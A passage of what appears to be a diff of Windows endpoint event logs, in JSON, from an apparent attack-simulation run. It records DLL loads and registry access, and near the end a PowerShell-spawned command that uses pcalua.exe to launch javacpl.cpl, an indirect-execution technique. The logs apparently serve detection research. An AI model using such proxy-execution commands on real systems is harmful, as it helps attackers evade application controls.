- "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007980000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "wer.dll", - "image_path": "C:\\Windows\\System32\\wer.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007980000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "imm32.dll", - "image_path": "C:\\Windows\\System32\\imm32.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007980000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:000000000008056A", - "registry_value": "W32:000000000008056A", - "timestamp": 131883574007980000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:000000000008056A", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:000000000008056A\\VirtualDesktop", - "registry_value": 
"VirtualDesktop", - "timestamp": 131883574007980000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "image_load", - "image_name": "uxtheme.dll", - "image_path": "C:\\Windows\\System32\\uxtheme.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007980000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "msctf.dll", - "image_path": "C:\\Windows\\System32\\msctf.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007980000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "dwmapi.dll", - "image_path": "C:\\Windows\\System32\\dwmapi.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007980000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM", - "registry_path": "HKLM\\SOFTWARE", - "registry_value": "SOFTWARE", - "timestamp": 131883574008130000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE", - "registry_path": "HKLM\\SOFTWARE\\Microsoft", - "registry_value": "Microsoft", - "timestamp": 131883574008130000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", - "registry_value": 
"Input", - "timestamp": 131883574008130000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "image_load", - "image_name": "TextInputFramework.dll", - "image_path": "C:\\Windows\\System32\\TextInputFramework.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574008130000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "CoreMessaging.dll", - "image_path": "C:\\Windows\\System32\\CoreMessaging.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574008130000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "CoreUIComponents.dll", - "image_path": "C:\\Windows\\System32\\CoreUIComponents.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574008130000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "ntmarta.dll", - "image_path": "C:\\Windows\\System32\\ntmarta.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574008130000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "WinTypes.dll", - "image_path": "C:\\Windows\\System32\\WinTypes.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574008130000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "WinTypes.dll", - "image_path": "C:\\Windows\\System32\\WinTypes.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 
131883574008130000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "ole32.dll", - "image_path": "C:\\Windows\\System32\\ole32.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574008130000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "propsys.dll", - "image_path": "C:\\Windows\\System32\\propsys.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574008130000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", - "registry_value": "Locales", - "timestamp": 131883574008130000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "image_load", - "image_name": "clbcatq.dll", - "image_path": "C:\\Windows\\System32\\clbcatq.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574008300000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "OneCoreUAPCommonProxyStub.dll", - "image_path": "C:\\Windows\\System32\\OneCoreUAPCommonProxyStub.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574008300000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "registry", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\WINDOWS\\system32\\pcalua.exe", - 
"registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", - "registry_value": "NameSpace", - "timestamp": 131883574008300000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "registry", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\WINDOWS\\system32\\pcalua.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", - "registry_value": "NameSpace", - "timestamp": 131883574008300000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "registry", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\WINDOWS\\system32\\pcalua.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace\\DelegateFolders", - "registry_value": "DelegateFolders", - "timestamp": 131883574008300000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "registry", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\WINDOWS\\system32\\pcalua.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883574008450000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "ndfapi.dll", - "image_path": 
"C:\\Windows\\System32\\ndfapi.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574008450000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574008450000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "wdi.dll", - "image_path": "C:\\Windows\\System32\\wdi.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574008450000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574008450000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "duser.dll", - "image_path": "C:\\Windows\\System32\\duser.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574008450000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "xmllite.dll", - "image_path": "C:\\Windows\\System32\\xmllite.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574008450000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "registry", - "pid": 2136, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": 
"HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio", - "registry_path": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal", - "registry_value": "Journal", - "timestamp": 131883574008610000, - "unique_pid": "{42FC7E13-B2AB-5C05-0000-0010B9AE0100}" - }, - { - "event_type": "image_load", - "image_name": "atlthunk.dll", - "image_path": "C:\\Windows\\System32\\atlthunk.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574008610000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "registry", - "pid": 2136, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal", - "registry_path": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal\\Render", - "registry_value": "Render", - "timestamp": 131883574008610000, - "unique_pid": "{42FC7E13-B2AB-5C05-0000-0010B9AE0100}" - }, - { - "event_type": "registry", - "pid": 6784, - "process_name": "AUDIODG.EXE", - "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", - "registry_value": "Properties", - "timestamp": 131883574008610000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "registry", - "pid": 6784, - "process_name": "AUDIODG.EXE", - "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", - "registry_value": "Properties", - "timestamp": 131883574008610000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "registry", - "pid": 6784, - "process_name": "AUDIODG.EXE", - "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", - "registry_value": "Properties", - "timestamp": 131883574008610000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "registry", - "pid": 6784, - "process_name": "AUDIODG.EXE", - "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", - "registry_value": "Properties", - "timestamp": 131883574008920000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "registry", - "pid": 6784, - "process_name": "AUDIODG.EXE", - "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", - "registry_value": "Properties", - "timestamp": 131883574008920000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "registry", - "pid": 6784, - "process_name": 
"AUDIODG.EXE", - "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", - "registry_value": "Properties", - "timestamp": 131883574008920000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "registry", - "pid": 4, - "process_name": "System", - "process_path": "System", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000", - "registry_value": "S-1-5-21-2047549730-3016700585-885829632-1000", - "timestamp": 131883574008920000, - "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}" - }, - { - "event_type": "registry", - "pid": 4, - "process_name": "System", - "process_path": "System", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32\\pcalua.exe", - "registry_value": "pcalua.exe", - "timestamp": 131883574008920000, - "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}" - }, - { - "event_type": "registry", - "pid": 4, - "process_name": "System", - "process_path": "System", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\SequenceNumber", - "registry_value": "SequenceNumber", - "timestamp": 
131883574008920000, - "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:0000000000040570", - "registry_value": "W32:0000000000040570", - "timestamp": 131883574008920000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:0000000000040570", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:0000000000040570\\VirtualDesktop", - "registry_value": "VirtualDesktop", - "timestamp": 131883574008920000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", - "registry_value": "Locales", - "timestamp": 131883574013520000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:0000000000040570", - "registry_value": "W32:0000000000040570", - "timestamp": 131883574013640000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "process", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "subtype": "terminate", - "timestamp": 131883574013690000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "registry", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\WINDOWS\\system32\\pcalua.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32\\pcalua.exe", - "registry_value": "pcalua.exe", - "timestamp": 131883574013690000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", - "registry_value": "Locales", - "timestamp": 131883574013690000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0\\cbjrefuryy.rkr", - "registry_value": "cbjrefuryy.rkr", - "timestamp": 131883574013869984, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", - "registry_value": "HRZR_PGYFRFFVBA", - "timestamp": 131883574013869984, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM", - "registry_path": "HKLM\\SOFTWARE", - "registry_value": "SOFTWARE", - "timestamp": 131883574013869984, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE", - "registry_path": "HKLM\\SOFTWARE\\Microsoft", - "registry_value": "Microsoft", - "timestamp": 131883574013869984, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", 
- "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", - "registry_value": "Input", - "timestamp": 131883574013869984, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "process", - "pid": 7060, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883574013869984, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010D2505701}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"pcalua.exe -a C:\\Windows\\system32\\javacpl.cpl\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 3920, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883574014000000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716D5701}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3920, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883574013960000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716D5701}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3920, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883574013960000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716D5701}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 
3920, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883574013960000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716D5701}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3920, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883574013960000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716D5701}" - }, - { - "event_type": "file", - "file_name": "PCALUA.EXE-5EB8CBC1.pf", - "file_path": "C:\\Windows\\Prefetch\\PCALUA.EXE-5EB8CBC1.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883574013960000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3920, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883574014050000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716D5701}" - }, - { - "event_type": "registry", - "pid": 3920, - "process_name": "cmd.exe", - "process_path": "C:\\WINDOWS\\system32\\cmd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32\\pcalua.exe", - "registry_value": "pcalua.exe", - "timestamp": 131883574014050000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716D5701}" - }, - { - "command_line": "pcalua.exe -a C:\\Windows\\system32\\javacpl.cpl", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 
